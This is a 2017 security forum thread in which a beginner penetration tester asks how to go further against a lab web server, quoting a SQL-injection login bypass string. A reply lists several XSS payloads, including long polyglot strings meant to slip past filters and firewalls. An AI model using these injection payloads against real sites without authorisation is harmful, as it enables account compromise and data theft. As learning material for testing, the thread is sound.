khudz Posted December 13, 2017 Share Posted December 13, 2017 Hello team, I'm new here as I am new to Penetration testing, my next challenge is to perform proper pen-testing on a Win XP SP2 and a CentOS (WebApp) server, I successfully finished with the Win XP in all aspects as for the CentOS I managed to inject SQL (asd' OR 1=1 OR 'a'='a) into the login form and get basic information but that was it, I tried using scripts (<script>alert(1);</script>) but nothing worked, nessus scan showed it's XSS vulnerable. I guess my main point is how further can I dig into the target and how? Cheers Quote Link to comment Share on other sites More sharing options...
digininja Posted December 13, 2017 Share Posted December 13, 2017 Unfortunately, without a lot more info, your question is too vague to give any specific help. How good are your HTML and JavaScript skills? I'd suggest looking at the SecurityTube web app testing videos, they cover stuff like this and should give you a good idea of what is going on. And if you are following a course, I'd look for a more up-to-date one, anything still using XP as a victim is very out of date. Quote Link to comment Share on other sites More sharing options...
zoro25 Posted December 13, 2017 Share Posted December 13, 2017 (edited) Also, I would suggest looking in the console of your browser for errors when injecting. As already mentioned without knowing the app or js/html of page it's hard to give a working payload However, you can try either -->'";</ScriPT><sCriPt><confirm()</scRiPt> Which may better break out of the HTML and is nice and short (similar to what you tried but I included single and double quotes and also the end of a comment just in case you end up in a comment section. Or you can try a polyglot injection payload, (these will usually set off a WebApp Firewall but feel free to try) javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>"><img -/style=a:expression(/*'/-/*',/**/eval(name)/*%2A///*///);width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>" Or jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)><marquee><img src=x onerror=alert(1)></marquee>" ></textarea\></|\><details/open/ontoggle=prompt`1` ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><sCrIpt>confirm(1)</scRipt>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><!-- which are both attempting to do the same thing. Good luck . ***** EDIT While it's not my intention to pop alerts on the hak5 forum, you can see that one of the polyglots is working as planned and is breaking out of tags to show a broken image, This is the equivalent of <img src="x" /> From here you would just need to tweak the code to pop an alert on a broken image, remember to read the console and attempt to bypassing protections. onerror=confirm() or something similar for a basic pop on a broken image. **** Edited December 18, 2017 by zoro25 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.